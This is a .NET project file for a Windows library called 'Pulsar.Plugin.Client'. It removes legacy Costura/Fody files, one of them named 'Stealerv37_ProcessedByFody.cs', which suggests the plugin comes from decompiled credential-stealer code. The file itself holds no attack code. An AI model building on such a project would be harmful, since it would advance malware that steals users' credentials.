<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <TargetFramework>net8.0-windows</TargetFramework>
    <OutputType>Library</OutputType>
    <UseWindowsForms>true</UseWindowsForms>
    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
    <CopyLocalLockFileAssemblies>true</CopyLocalLockFileAssemblies>
    <AssemblyName>Pulsar.Plugin.Client</AssemblyName>
    <GenerateAssemblyInfo>false</GenerateAssemblyInfo>
    <Configurations>Debug;Release</Configurations>
    <Platforms>AnyCPU</Platforms>
  </PropertyGroup>

  <ItemGroup>
    <PackageReference Include="System.Management" Version="8.0.0" />
    <PackageReference Include="System.IO.Hashing" Version="8.0.0" />
  </ItemGroup>

  <!-- Exclude Legacy Costura/Fody stuff which is replaced by modern .NET SingleFile if needed, 
       or just not needed for a library plugin -->
  <ItemGroup>
    <Compile Remove="Costura\**" />
    <EmbeddedResource Remove="costura\**" />
    <Compile Remove="Stealerv37_ProcessedByFody.cs" />
    <Compile Remove="_003CModule_003E.cs" />
  </ItemGroup>

</Project>